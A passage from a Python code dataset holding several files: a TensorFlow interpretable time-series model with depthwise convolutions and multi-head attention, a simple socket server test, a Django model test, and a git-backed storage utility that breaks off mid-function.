depthwise_initializer=tf.keras.initializers.HeUniform(),\n **kwargs):\n super(residual_block, self).__init__()\n self.dropout = Dropout(dropout)\n self.conv1 = DepthwiseConv1D(\n depthwise_kernel_size,\n dilation_rate=dilation_rate,\n name='depthwiseConv1D_dilation_{}_0'.format(dilation_rate),\n padding=padding, activation=activation,\n depth_multiplier=depth_multiplier,\n depthwise_initializer=depthwise_initializer)\n self.conv2 = DepthwiseConv1D(\n depthwise_kernel_size,\n dilation_rate=dilation_rate,\n name='depthwiseConv1D_dilation_{}_1'.format(dilation_rate),\n padding=padding, activation=activation,\n depth_multiplier=depth_multiplier,\n depthwise_initializer=depthwise_initializer)\n self.conv1x1 = DepthwiseConv1D(\n 1, padding=padding,\n activation=tf.keras.activations.linear,\n depth_multiplier=depth_multiplier,\n kernel_initializer=tf.keras.initializers.GlorotUniform())\n self.depth_multiplier = depth_multiplier\n self.dilation_rate = dilation_rate\n\n def call(self, x):\n\n # get dimensions\n\n batch_size = tf.cast(tf.shape(x)[0], dtype=tf.int32)\n Tx = tf.cast(tf.shape(x)[1], dtype=tf.int32)\n\n # get residual\n\n \"\"\"\n For the case of depth_multiplier != 1:\n x before and after the convolution will have a different amount of\n channels. Thus, a 1x1 convolution is applied. This is relevant only\n for the first residual block with dilation_rate = 1.\n \"\"\"\n if self.dilation_rate == 1 and self.depth_multiplier > 1:\n n_features = tf.cast(tf.shape(x)[2], dtype=tf.int32)\n x_res = self.conv1x1(x)\n # shape == (batch, Tx, n_features*depth_multiplier)\n else:\n x_res = x # 1x1 Convolution not needed\n n_features = tf.cast(tf.shape(x)[2]/self.depth_multiplier,\n dtype=tf.int32)\n\n # apply first conv\n\n x = self.conv1(x) # shape == (batch, Tx, n_features*depth_multiplier)\n \"\"\"\n DepthwiseConv1D does not support having multiple channels per feature\n as input. Thus, the convolution is applied to x\n [batch, Tx, n features*channels] rather than\n [batch, Tx, n features, channels]. To compensate, the result of this\n convolution has to be reshaped after the convolution. This is not the\n case for the very first convolution, as the input is x\n [batch, Tx, n features].\n \"\"\"\n multi_channel = False\n # if not the first residual block, apply multi-channel computation in\n # first conv\n if self.dilation_rate > 1:\n multi_channel = True\n if multi_channel:\n x = tf.reshape(x, (batch_size, Tx, n_features,\n self.depth_multiplier, self.depth_multiplier))\n x = tf.reduce_sum(x, axis=-2)\n x = tf.reshape(x, (batch_size, Tx,\n n_features*self.depth_multiplier))\n multi_channel = True\n # apply activation\n x = tf.keras.activations.swish(x)\n x = self.dropout(x)\n\n # second convolution\n\n x = self.conv2(x)\n\n if multi_channel:\n x = tf.reshape(x, (batch_size, Tx, n_features,\n self.depth_multiplier, self.depth_multiplier))\n x = tf.reduce_sum(x, axis=-2)\n x = tf.reshape(x, (batch_size, Tx,\n n_features*self.depth_multiplier))\n # apply activation\n x = tf.keras.activations.swish(x)\n x = self.dropout(x)\n\n # residual connection\n\n out = x + x_res\n\n return out\n\n\nclass deal_with_tf_bug(Layer):\n \"\"\" If this layer is not used, tf will complain about the shapes not being known in the next layer and the model can\n only be fit if run_eagerly=True. Unfortunately, no other fix could be found. This layer applies some dummy\n computations that will not affect the output of the residual blocks.\n \"\"\"\n\n def __init__(self, Tx):\n super(deal_with_tf_bug, self).__init__()\n self.wa = Dense(Tx, trainable=False)\n self.wb = Dense(Tx, trainable=False)\n self.Tx = Tx\n\n def call(self, x):\n keys = self.wa(x)\n queries = self.wb(x)\n scores = keys * queries\n dk = tf.math.sqrt(tf.cast(self.Tx, dtype=tf.float32))\n scores = scores / dk\n att = tf.math.divide_no_nan(scores + 0.0000001, scores + 0.0000001)\n out = att * x\n\n return out\n\n\nclass MultiHeadAttention(Layer):\n \"\"\"\n Multi-Head-Attention as described in Attention is all you need (2017).\n\n Input shape:\n 3D Tensor with shape:\n [batch, n features, Tx]\n Output shape:\n out: 3D tensor of shape == (batch, n features, d_model)\n att_weights: attention weights of shape ==\n (batch, num_heads, n features, n features)\n values: values of shape == (batch, num_heads, n features,\n d_model, depth)\n \"\"\"\n\n def __init__(self, d_model, num_heads, regularization, p):\n super(MultiHeadAttention, self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n self.regularization = regularization\n self.p = p\n\n # assert that d_model can be split into equally sized heads\n assert self.d_model % self.num_heads == 0\n\n # depth of each head is d_model/num_heads\n # -> overall computational cost is the same\n self.depth = self.d_model // self.num_heads\n\n self.wq = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n self.wk = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n self.wv = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n\n self.dense = TimeDistributed(Dense(\n d_model,\n kernel_initializer=tf.keras.initializers.GlorotUniform()))\n\n def split_heads(self, x, batch_size, n_features):\n \"\"\" Split the last dimension (d_model) into (num_heads, depth).\n Transpose to (batch, num_heads, features, depth).\n \"\"\"\n x = tf.reshape(x, (batch_size, n_features, self.num_heads, self.depth))\n\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def dropAttention(self, attention_weights, p):\n \"\"\"\n Regularization method for attention following the paper:\n https://arxiv.org/pdf/1907.11065.pdf\n With a probability of p a column of the attention weights is set to 0.\n This leads to a feature in the values v being ignored with a\n probability of p during training. An individual mask is generated for\n each sample in a batch, whereas the same mask is used across different\n heads.\n\n Args:\n attention weights: shape == (batch_size, num_heads, features,\n features)\n p: probability to set a column to 0\n\n Returns:\n attention_weights\n \"\"\"\n\n batch_size = tf.shape(attention_weights)[0]\n n_features = tf.shape(attention_weights)[-1]\n # create mask that sets columns to 0 with a certain probability\n # different mask for every sample in batch\n mask = tf.random.uniform(shape=(batch_size, n_features)) > p\n mask = tf.cast(mask, dtype='float32')\n mask = tf.reshape(mask, [batch_size, 1, 1, -1])\n # mask attention weights\n attention_weights = attention_weights*mask\n # normalized rescaling of attention_weights to ensure that attention\n # weights in every row sum up to 1\n # row vector a_j = a_j / sum(a_j)\n # add constant gamma to avoid 0-division\n gamma = tf.constant(1e-12, shape=(1, 1, 1), dtype='float32')\n sum_att = tf.reduce_sum(attention_weights, axis=-1) + gamma\n attention_weights = attention_weights / tf.expand_dims(sum_att,\n axis=-1)\n\n return attention_weights\n\n def scaled_dot_product_attention(self, q, k, v, regularization, p,\n training):\n \"\"\"\n Scaled-dot-product attention following Attention is all you need (2017)\n\n\n Args:\n q, k, v == (..., features, depth)\n regularization: 'dropout' or 'dropAttention', where 'dropout' does\n not affect scaled_dot_product_attention\n p: dropattention probability\n training: True for training, False at inference\n\n Returns:\n scaled_values, attention weights\n\n \"\"\"\n matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., features,\n # features)\n # scale with sqrt(d_model)\n dk = tf.cast(tf.shape(k)[-1], dtype='float32')\n scaled_matmul_qk = matmul_qk / tf.math.sqrt(dk)\n # compute attention weights along last axis so that attention weights\n # add up to 1\n attention_weights = tf.nn.softmax(scaled_matmul_qk, axis=-1)\n # (..., features, features)\n # apply dropattention if desired\n if regularization == 'dropAttention' and training:\n attention_weights = self.dropAttention(attention_weights, p)\n\n # scale values with attention weights\n scaled_values = tf.matmul(attention_weights, v)\n # shape == (batch, num_heads, n_features, depth)\n\n return scaled_values, attention_weights\n\n def call(self, q, k, v, training):\n batch_size = tf.shape(q)[0]\n n_features = tf.shape(q)[1]\n\n # compute queries, keys and values linear transformation\n q = self.wq(q) # (batch, features, d_model)\n k = self.wk(k) # (batch, features, d_model)\n v = self.wv(v) # (batch, features, d_model)\n # split heads\n q = self.split_heads(q, batch_size, n_features)\n # (batch, num_heads, features, depth)\n k = self.split_heads(k, batch_size, n_features)\n # (batch, num_heads, features, depth)\n v = self.split_heads(v, batch_size, n_features)\n # (batch, num_heads, features, depth)\n\n # compute attention\n # att_out == shape (batch_size, num_heads, depth)\n # att_weights == shape (batch_size, num_heads, features, features)\n\n att_out, att_weights = self.scaled_dot_product_attention(\n q, k, v,\n self.regularization, self.p, training)\n\n # concat attention outputs\n\n att_out = tf.transpose(att_out, perm=[0, 2, 1, 3])\n # shape == (batch, n_features, num_heads, depth)\n concat_att_out = tf.reshape(att_out, (batch_size,\n tf.shape(att_out)[1], self.d_model))\n # (batch, n_features, d_model)\n\n # apply linear projection to combine outputs of the different heads\n if self.num_heads > 1:\n concat_att_out = self.dense(concat_att_out)\n\n return concat_att_out, att_weights, v\n\n\nclass prediction_block(Layer):\n\n \"\"\" Block of a series of Conv1D\n\n Input shape:\n 3D Tensor with shape:\n [batch, Tx, n features]\n Output shape:\n 3D Tensor with shape:\n [batch, Tx, 1]\n \"\"\"\n def __init__(self, filters=8, kernel_size=2,\n activation=tf.keras.activations.swish,\n dilation_rates=[1, 2], dropout=0.1, padding='causal',\n kernel_initializer='he_uniform'):\n super(prediction_block, self).__init__()\n self.convs = []\n for dilation_rate in dilation_rates:\n self.convs.append(Conv1D(\n filters, kernel_size, padding=padding,\n data_format='channels_last', dilation_rate=dilation_rate,\n activation=activation,\n kernel_initializer=tf.keras.initializers.HeUniform()))\n self.out = Conv1D(\n 1, 1, padding='same', data_format='channels_last',\n kernel_initializer=tf.keras.initializers.GlorotUniform())\n self.dropout = Dropout(dropout)\n self.filters = filters\n\n def call(self, x):\n # Conv1D\n for conv in self.convs:\n x = conv(x)\n x = self.dropout(x)\n # 2D Convolution to merge channels\n out = self.out(x)\n\n return out\n\n\n@keras_export('keras.layers.DepthwiseConv1D')\nclass DepthwiseConv1D(Conv1D):\n \"\"\"Depthwise 1D convolution.\n Depthwise convolution consist of performing a depthwise convolution\n that acts separately on channels.\n Arguments:\n kernel_size: A single integer specifying the spatial\n dimensions of the filters.\n dilation_rate: A single integer specifying the dilation factor of the\n convolution.\n strides: A single integer specifying the strides of the convolution.\n Specifying any `stride` value != 1 is incompatible with specifying\n any `dilation_rate` value != 1.\n padding: One of `\"valid\"`, `\"same\"`, or `\"causal\"` (case-insensitive).\n `\"valid\"` means no padding. `\"same\"` results in padding evenly to\n the left/right or up/down of the input\n such that output has the same height/width dimension as the input.\n `\"causal\"` results in causal(dilated)\n convolutions, e.g. `output[t]` does not depend on `input[t+1:]`.\n depth_multiplier: The number of depthwise convolution output channels\n for each input channel.\n data_format: A string,\n one of \"channels_last\"(default) or \"channels_first\".\n [..., length, channels] or [..., channels, length]\n activation: Activation function to use.\n If nothing is specified, no activation is applied (a(x)=x)\n use_bias: Boolean, whether the layer uses a bias vector.\n depthwise_initializer: Initializer for the depthwise kernel matrix.\n bias_initializer: Initializer for the bias vector.\n depthwise regularizer: Regularizer function applied to depthwise the\n depthwise kernel matrix.\n bias_regularizer: Regularizer function applied to the bias vector\n activity_regularizer: Regularizer applied to the activation.\n depthwise_constraint: Constraint function applied to the depthwise\n kernel matrix.\n bias_constraint: Constraint function applied to the bias vector.\n Input shape:\n 3D Tensor with shape:\n `[batch, channels, length]` if data_format = \"channels_first\"\n or\n 3D Tensor with shape:\n `[batch, length, channels]` if data_format = \"channels_last\"\n Output shape:\n 3D Tensor with shape:\n `[batch, filters, new_length]` if data_format = \"channels_first\"\n or\n 3D Tensor with shape:\n `[batch, new_length, filters]` if data_format = \"channels_last\"\n\n \"\"\"\n\n def __init__(self,\n kernel_size,\n dilation_rate=1,\n strides=1,\n padding='causal',\n depth_multiplier=1,\n data_format='channels_last',\n activation=None,\n use_bias=True,\n depthwise_initializer='glorot_uniform',\n bias_initializer='zeros',\n depthwise_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n depthwise_constraint=None,\n bias_constraint=None,\n **kwargs):\n super(DepthwiseConv1D, self).__init__(\n filters=None,\n dilation_rate=dilation_rate,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n data_format=data_format,\n activation=activation,\n use_bias=use_bias,\n bias_regularizer=bias_regularizer,\n activity_regularizer=activity_regularizer,\n bias_constraint=bias_constraint,\n **kwargs)\n self.depth_multiplier = depth_multiplier\n self.depthwise_initializer = initializers.get(depthwise_initializer)\n self.depthwise_regularizer = regularizers.get(depthwise_regularizer)\n self.depthwise_constraint = constraints.get(depthwise_constraint)\n self.bias_initializer = initializers.get(bias_initializer)\n\n def build(self, input_shape):\n if len(input_shape) < 3:\n raise ValueError('Inputs to `DepthwiseConv1D` should have rank 3'\n 'Recieved input shape:', str(input_shape))\n input_shape = tensor_shape.TensorShape(input_shape)\n channel_axis = self._get_channel_axis()\n if input_shape.dims[channel_axis].value is None:\n raise ValueError('The channel dimension of the input to '\n '`DepthwiseConv1D` should be defined.'\n ' Found `None`.')\n input_dim = int(input_shape[channel_axis])\n depthwise_kernel_shape = (self.kernel_size[0],\n input_dim,\n self.depth_multiplier)\n\n self.depthwise_kernel = self.add_weight(\n shape=depthwise_kernel_shape,\n initializer=self.depthwise_initializer,\n name='depthwise_kernel',\n regularizer=self.depthwise_regularizer,\n constraint=self.depthwise_constraint)\n\n if self.use_bias:\n self.bias = self.add_weight(\n shape=(input_dim*self.depth_multiplier,),\n initializer=self.bias_initializer,\n name='bias',\n regularizer=self.bias_regularizer,\n constraint=self.bias_constraint)\n else:\n self.bias = None\n self.input_spec = InputSpec(ndim=3, axes={channel_axis: input_dim})\n self.built = True\n\n def call(self, inputs):\n # causal padding of inputs by left padding along the sequence axis\n if self.padding == 'causal':\n inputs = tf.pad(inputs, self._compute_causal_padding(inputs))\n if self.data_format == 'channels_last':\n strides = (1,) + self.strides * 2 + (1,)\n spatial_start_dim = 1\n else:\n strides = (1, 1) + self.strides * 2\n spatial_start_dim = 2\n\n # Explicitly broadcast inputs and kernels to 4D.\n inputs = array_ops.expand_dims(inputs, spatial_start_dim)\n depthwise_kernel = array_ops.expand_dims(self.depthwise_kernel, 0)\n dilation_rate = (1,) + self.dilation_rate\n\n if self.padding == 'causal':\n op_padding = 'valid'\n else:\n op_padding = self.padding\n\n # Compute depthwiseConv2D on broadcasted inputs\n outputs = nn.depthwise_conv2d(\n inputs,\n depthwise_kernel,\n strides=strides,\n padding=op_padding.upper(),\n dilations=dilation_rate,\n data_format=conv_utils.convert_data_format(self.data_format,\n ndim=4))\n\n if self.use_bias:\n outputs = nn.bias_add(\n outputs,\n self.bias,\n data_format=conv_utils.convert_data_format(self.data_format,\n ndim=4))\n\n outputs = array_ops.squeeze(outputs, [spatial_start_dim])\n\n if self.activation is not None:\n return self.activation(outputs)\n\n return outputs\n\n @tf_utils.shape_type_conversion\n def compute_output_shape(self, input_shape):\n if self.data_format == 'channels_first':\n length = input_shape[2]\n out_filters = input_shape[1] * self.depth_multiplier\n elif self.data_format == 'channels_last':\n length = input_shape[1]\n out_filters = input_shape[2] * self.depth_multiplier\n\n # length = conv_utils.conv_output_length(length, self.kernel_size,\n # self.padding,\n # self.strides)\n if self.data_format == 'channels_first':\n return (input_shape[0], out_filters, length)\n elif self.data_format == 'channels_last':\n return (input_shape[0], length, out_filters)\n\n\n# Interpretable NN class\n\nclass TFAN(tf.keras.Model):\n \"\"\"\n Arguments:\n\n residual_blocks: integer specifying the amount of residual blocks\n residual_dropout: float, sepcifying the dropout rate in the residual\n blocks.\n activation: Activation to use for depthwise convolutions and all final\n convolutions but the last (linear).\n depthwise_padding: padding style used for Depthwise 1D Convolutions:\n one of \"valid\", \"same\", \"causal\"\n depthwise_kernel_size: Integer specifying depthwise kernel size.\n depth_multiplier: Integer, specifying the amount of filter per channel in\n the depthwise convolutions.\n Tx: Integer specifying amount of time-steps per feature in input data.\n kernel_initializer: Weight initializer used in residual block and final\n convolutions\n num_heads: Integer specifiyng the amount of heads in Multi-Head-Attention.\n d_model: Dimensionality of attention mechanism in Multi-Head-Attention.\n regularization: A string, being one of \"dropout\" or \"dropAttention\"\n p: A float, between [0,1] specifiying the regularization probability for\n the method specified in \"regularization\".\n final_filters: Integer specifying the amount of output channels in the\n prediction block Conv1D.\n final_kernel_size: Integer specifying the kernel size of the 1d-Convolution\n in the prediction block.\n final_dilations: List of dilations, where one Conv1D layer will be\n initialised per entry in list.\n final_padding: padding style used for final 1D Convolutions: one of\n \"valid\", \"same\", \"causal\"\n final_dropout: float, sepcifying the dropout rate in the prediction block.\n\n Input shape:\n x: 3D tensor of shape == (batch, Tx, n features)\n Outputs shape:\n out: 3D tensor of shape == (batch, Tx, 1) target time series\n att_weights: attention weights of MHA of shape == (batch, num_heads,\n n features,\n n features)\n values: values of MHA of shape == (batch, num_heads, n features,\n d_model(num_heads))\n\n \"\"\"\n def __init__(self, residual_blocks=4, residual_dropout=0.2,\n activation=tf.keras.activations.swish,\n depthwise_padding=\"causal\", depthwise_kernel_size=2,\n depth_multiplier=1, Tx=20,\n kernel_initializer=tf.keras.initializers.HeUniform(),\n num_heads=8, d_model=32,\n regularization=\"dropout\", p=0.25,\n final_filters=8, final_kernel_size=2,\n final_dilations=[1, 2], final_padding='causal',\n final_dropout=0.2):\n super(TFAN, self).__init__()\n\n # Residual Blocks\n self.res_blocks = []\n for dilation in range(residual_blocks):\n self.res_blocks.append(residual_block(\n depthwise_kernel_size,\n dilation_rate=dilation + 1,\n padding=depthwise_padding, activation=activation,\n dropout=residual_dropout,\n depth_multiplier=depth_multiplier,\n depthwise_initializer=kernel_initializer,\n name='residual_block_{}'.format(dilation)))\n self.depth_multiplier = depth_multiplier\n # deal with tf bug -> see layer\n self.deal_with_tf_bug = deal_with_tf_bug(Tx)\n # Merging of depthwise channels\n merge_channels_trainable = (depth_multiplier > 1)\n self.merge_channels = DepthwiseConv1D(\n 1, dilation_rate=1,\n data_format='channels_last', name='merge_channels',\n padding='same', activation='linear', depth_multiplier=1,\n depthwise_initializer='glorot_uniform', trainable=merge_channels_trainable)\n # MHA\n self.mha = MultiHeadAttention(d_model, num_heads, regularization, p)\n # Final Convolutions\n self.pred_block = prediction_block(\n filters=final_filters,\n kernel_size=final_kernel_size,\n activation=activation, dilation_rates=final_dilations,\n dropout=final_dropout, padding=final_padding,\n kernel_initializer=kernel_initializer)\n\n def call(self, x, training=None):\n\n # residual blocks\n for block in self.res_blocks:\n x = block(x)\n # x of shape == (batch, Tx, n features*depth_multiplier)\n\n # merge channels if necessary\n if self.depth_multiplier > 1:\n x = self.merge_channels(x)\n x = tf.reshape(x, (tf.shape(x)[0], tf.shape(x)[1],\n int(tf.shape(x)[-1] / self.depth_multiplier),\n self.depth_multiplier))\n x = tf.reduce_sum(x, axis=-1)\n # x of shape == (batch, Tx, n features)\n\n # transpose to shape required by mha\n x = tf.transpose(x, perm=[0, 2, 1])\n # x of shape == (batch, n features, Tx)\n\n # apply dummy layer to deal with tensorflow bug\n # this layer will not impact x\n # it is just necessary for tf to catch up on the shapes, this will prevent a value error in mha\n x = self.deal_with_tf_bug(x)\n\n # MHA\n x, att, val = self.mha(x, x, x, training)\n\n # x of shape == (batch, n features, d_model)\n # att of shape == (batch, num_heads, n features, n features)\n # val of shape == (batch, num_heads, n features, depth)\n\n # transpose\n x = tf.transpose(x, perm=[0, 2, 1])\n # x of shape == (batch, Tx, n features)\n\n # Prediction\n out = self.pred_block(x) # shape == (batch, Tx, 1)\n\n return out, att, val\n\n # override train step to only pass \"out\" to loss and ignore\n # attention weights and values\n\n def train_step(self, data):\n x, y = data\n with tf.GradientTape() as tape:\n # forward pass\n y_pred, _, _ = self(x, training=True)\n # Compute the loss\n loss = self.compiled_loss(y, y_pred,\n regularization_losses=self.losses)\n\n # Compute gradients\n trainable_vars = self.trainable_variables\n gradients = tape.gradient(loss, trainable_vars)\n # Update weights\n self.optimizer.apply_gradients(zip(gradients, trainable_vars))\n # Update metrics (includes the metric that tracks the loss)\n self.compiled_metrics.update_state(y, y_pred)\n\n return {m.name: m.result() for m in self.metrics}\n","sub_path":"TFAN/tfan_layers.py","file_name":"tfan_layers.py","file_ext":"py","file_size_in_byte":29078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21195655","text":"#!/usr/bin/python\n# -*- coding:UTF-8 -*-\nimport socket\n\ns=socket.socket()\nhost = socket.gethostname() # get the host name\nport = 12345 # set the port\ns.bind((host,port)) # attach the port to the host\ns.listen(5) # waiting for the connection\n\nwhile True:\n c,addr = s.accept() # setup the connection\n print(\"connection location:\", addr)\n c.send(\"test success!\")\n c.close() # shutdown the connection\n","sub_path":"iot/learning/test/1server_test.py","file_name":"1server_test.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109580996","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom .models import CoffeHouse\n\n# Create your tests here.\n\n\nclass BlogTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n test_user = get_user_model().objects.create_user(\n username='testuser', password='password')\n test_user.save()\n\n test_post = CoffeHouse.objects.create(\n cheff=test_user,\n drink='coffee',\n description='Hot drink with amazing kinds'\n )\n test_post.save()\n\n def test_blog_content(self):\n post = CoffeHouse.objects.get(id=1)\n actual_cheff = str(post.cheff)\n actual_drink = str(post.drink)\n actual_description = str(post.description)\n self.assertEqual(actual_cheff, 'testuser')\n self.assertEqual(actual_drink, 'coffee')\n self.assertEqual(\n actual_description, 'Hot drink with amazing kinds')\n","sub_path":"coffehouseapp/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"114086602","text":"from .GitRepo import default_remote_location,GitRepo,is_git_dir\nfrom wk import Folder,copy_file,copy_dir,copy_fsitem,remove_fsitem,is_empty_dir\nfrom wk.basic import T,TMetaClass,CONST_TYPE\nimport os,shutil,glob,uuid,random\nfrom .utils import generate_hash\n_T=CONST_TYPE\nclass CONST(metaclass=TMetaClass):\n remote_branch_list=_T()\n master=_T()\n empty=_T()\n\n# TODO: improve performance\n\n\n_BRANCH_LIST='remote_branch_list'\nUSER_HOME=os.path.expanduser('~')\nSTORE_HOME=USER_HOME+'/.store'\nBRANCH_LIST_DIR=STORE_HOME+'/BranchLists'\n\n\ndef get_default_path(remote_location,remote_branch):\n name = generate_hash(remote_location + '/' + remote_branch)\n path = BRANCH_LIST_DIR + '/' + name\n return path\n\ndef get_default_remote_branch_list(remote_location):\n bd=RemoteBranchList(remote_location=remote_location)\n return bd\n\nclass StoreItem(Folder):\n '''\n issue: Branch name has a limit\n '''\n delimiter='.-.'\n special_branches = ['master', 'empty', 'remote_branch_list']\n legal_path_chars = [str(i) for i in range(10)]+[chr(i) for i in range(65, 91)]+[chr(i) for i in range(97, 123)]+list('._-')\n def status(self,repo=None):\n repo=repo or self.repo\n from wk.basic import PointDict\n info=PointDict(\n current_branch=repo.active_branch(),\n local_branches=repo.branch_list(),\n status=repo.status()\n )\n print(info)\n return info\n def __init__(self,path,remote_location=None,remote_branch=None,is_remote_branch_list=False):\n remote_location = remote_location or default_remote_location\n assert remote_branch\n if not os.path.exists(path):\n os.makedirs(path)\n path=os.path.abspath(path)\n Folder.__init__(self,path)\n if is_git_dir(path):\n repo=GitRepo(path)\n else:\n repo=GitRepo.init(path)\n self.repo=repo\n self.path=path\n self.remote_location=remote_location or default_remote_location\n self.remote_branch=remote_branch\n self.data_list=['.git','.type.store'] # clean except\n self.info_list=['.git','.type.store','.more.store'] # copy except\n self.typefile=self.openFiledict('.type.store')\n self.is_remote_branch_list = is_remote_branch_list\n self.init_branches()\n if not is_remote_branch_list:\n self.rbl=get_default_remote_branch_list(remote_location=self.remote_location)\n print(\"Init StoreFolder finished.\")\n def _try_pull_remote(self):\n try:\n self._pull_remote()\n except:\n import logging\n logging.warning(\"Can't pull remote branch %s , maybe because local branch has already been updates.\"%(self.remote_branch))\n def _pull_remote(self):\n repo=self.repo\n repo.pull(self.remote_location,self.remote_branch)\n def _push_self(self):\n repo=self.repo\n repo.add_all()\n repo.commit()\n repo.push(self.remote_location,self.remote_branch)\n def _push_if_not_exists(self):\n if not self.rbl.branch_exists(self.remote_branch):\n self._push_self()\n self.rbl.branch_add(self.remote_branch)\n def _pull_else_push_self(self):\n remote_branch=self.remote_branch\n if not self.rbl.exists(remote_branch):\n self._push_self()\n else:\n self._try_pull_remote()\n\n\n # def _pull_remote_branch_list(self,repo=None,remote_location=None,remote_branch='remote_branch_list',hard=False):\n # repo=repo or self.repo\n # remote_location=remote_location or self.remote_location\n # pull=False\n # if not 'remote_branch_list' in repo.branch_list():\n # repo.branch_create('remote_branch_list')\n # pull=True\n # if hard:\n # pull=True\n # if pull:\n # try:\n # br = repo.active_branch()\n # repo.checkout_branch('remote_branch_list')\n # repo.clean()\n # repo.add_all()\n # repo.commit()\n # repo.pull(remote_location, branch=remote_branch)\n # repo.checkout_branch(br)\n # except:\n # print(\"Can't pull remote_branch_list, maybe because local branch is already updated.\")\n\n def init_branches(self,repo=None):\n '''\n A store repo has 3 branches: master , empty , remote_branch_list, remote_branch\n '''\n repo=repo or self.repo\n if not repo.branch_list():\n repo.commit() # create master\n if not 'empty' in repo.branch_list():\n repo.branch_create('empty')\n repo.checkout_branch('empty')\n repo.clean()\n repo.commit()\n repo.checkout_branch('master')\n if not self.remote_branch in repo.branch_list():\n repo.branch_create(self.remote_branch)\n repo.checkout_branch(self.remote_branch)\n repo.clean()\n repo.commit()\n repo.checkout_branch('master')\n repo.checkout_branch(self.remote_branch)\n\n # def _read_remote_branch_list(self,pull=False):\n # repo=self.repo\n # br = repo.active_branch()\n # repo.checkout_branch(CONST.remote_branch_list)\n # if pull:\n # self._pull_remote_branch_list(repo)\n # lf = self.openSimpleListfile(CONST.remote_branch_list)\n # li = lf.read()\n # repo.checkout_branch(br)\n # return li\n # def _add_to_remote_branch_list(self,branch):\n # repo=self.repo\n # br=repo.active_branch()\n # self._pull_remote_branch_list(hard=True)\n # repo.checkout_branch(CONST.remote_branch_list)\n # # repo.pull(self.remote_location,CONST.remote_branch_list)\n # lf=self.openSimpleListfile(CONST.remote_branch_list)\n # li=lf.read()\n # # print(\"original:\",li)\n # li.append(branch)\n # li=list(set(li))\n # # print(\"now:\",li)\n # lf.write(li)\n # repo.add_all()\n # repo.commit()\n # repo.push(self.remote_location,CONST.remote_branch_list)\n # repo.checkout_branch(br)\n def iter_contentpath(self):\n lis=[]\n for name in self.listdir():\n if name in self.info_list:\n continue\n else:\n path=self.path+'/'+name\n lis.append(path)\n return lis\n def set_type(self,type):\n self.typefile.type=type\n return type\n def get_type(self):\n if not self.typefile.get('type'):\n return None\n return self.typefile.type\n @classmethod\n def pull(cls,remote_location=None,remote_branch=None,path=None,overwrite=False):\n remote_location=remote_location or default_remote_location\n remote_branch=remote_branch or 'master'\n if os.path.exists(path) and len(os.listdir(path)):\n if overwrite:\n shutil.rmtree(path)\n else:\n raise FileExistsError(\"Can't pull because folder %s is not empty.\"%(path))\n if not os.path.exists(path):\n os.makedirs(path)\n repo=GitRepo.init(path)\n if not repo.branch_list():\n repo.add_all()\n repo.commit()\n if not remote_branch in repo.branch_list():\n repo.branch_create(remote_branch)\n repo.checkout_branch(remote_branch)\n repo.clean()\n repo.pull(remote_location,branch=remote_branch)\n item=cls(repo.path,remote_location=remote_location,remote_branch=remote_branch)\n type=item.get_type()\n if not type:\n type=item.set_type(T.FOLDER)\n import logging\n logging.warning('StoreItem %s has no type, so we set it as %s'%(item.path,type))\n if type==T.FOLDER:\n return StoreFolder(repo.path,remote_location=remote_location,remote_branch=remote_branch)\n else:\n assert type==T.FILE\n return StoreFile(repo.path,remote_location=remote_location,remote_branch=remote_branch)\n @classmethod\n def openStorefolder(cls,path,remote_location=None,remote_branch=None,force_pull=False,overwrite=False):\n remote_location=remote_location or default_remote_location\n if not is_git_dir(path):\n force_pull=True\n if not force_pull:\n item=StoreFolder(path,remote_location=remote_location,remote_branch=remote_branch)\n else:\n item=StoreFolder.pull(remote_location=remote_location,remote_branch=remote_branch,path=path,overwrite=overwrite)\n return item\n @classmethod\n def openStorefile(cls,path,remote_location=None,remote_branch=None,force_pull=False,overwrite=False):\n remote_location=remote_location or default_remote_location\n if not is_git_dir(path):\n force_pull=True\n if not force_pull:\n item=StoreFile(path,remote_location=remote_location,remote_branch=remote_branch)\n else:\n item=StoreFile.pull(remote_location=remote_location,remote_branch=remote_branch,path=path,overwrite=overwrite)\n return item\n def upload(self,remote_location=None,remote_branch=None,overwrite=True):\n # Todo:get remote branch list\n # deprecated !!!\n\n remote_loacation=remote_location or self.remote_location\n remote_branch=remote_branch or self.remote_branch\n assert remote_loacation and remote_branch\n assert remote_branch !='master'\n repo=self.repo\n repo.add_all()\n repo.commit()\n # br=repo.active_branch()\n if not remote_branch in repo.branch_list():\n repo.branch_create(remote_branch)\n repo.checkout_branch(remote_branch)\n\n repo.push(remote_loacation,remote_branch)\n # print(\"list:\", self.listdir())\n # repo.checkout_branch(br)\n self.rbl.branch_add_if_not_exists(remote_branch)\n @classmethod\n def export(cls,path,remote_branch,remote_location=default_remote_location,name=None,cache_dir='.tmp',overwrite=False):\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n def _export_dir(obj,path,cache_dir):\n for p in obj.iter_contentpath():\n copy_fsitem(p, path)\n more = obj.morefile.copy()\n # obj.rmself()\n for nm, br in more.items():\n br_cache_dir=cache_dir+'/'+br\n cls.export(path, remote_location=remote_location, remote_branch=br, name=nm, cache_dir=br_cache_dir,overwrite=overwrite)\n this_dir=cache_dir+'/.this'\n obj=StoreItem.pull(remote_location=remote_location,remote_branch=remote_branch,path=this_dir)\n # print(obj.path)\n # print(\"list:\", obj.morefile)\n # print(\"list:\", obj.listdir())\n # input()\n\n if isinstance(obj,StoreFolder):\n if not os.path.exists(path):\n os.makedirs(path)\n assert os.path.isdir(path)\n name = name or remote_branch.split(cls.delimiter)[-1]\n path=path+'/'+name\n if 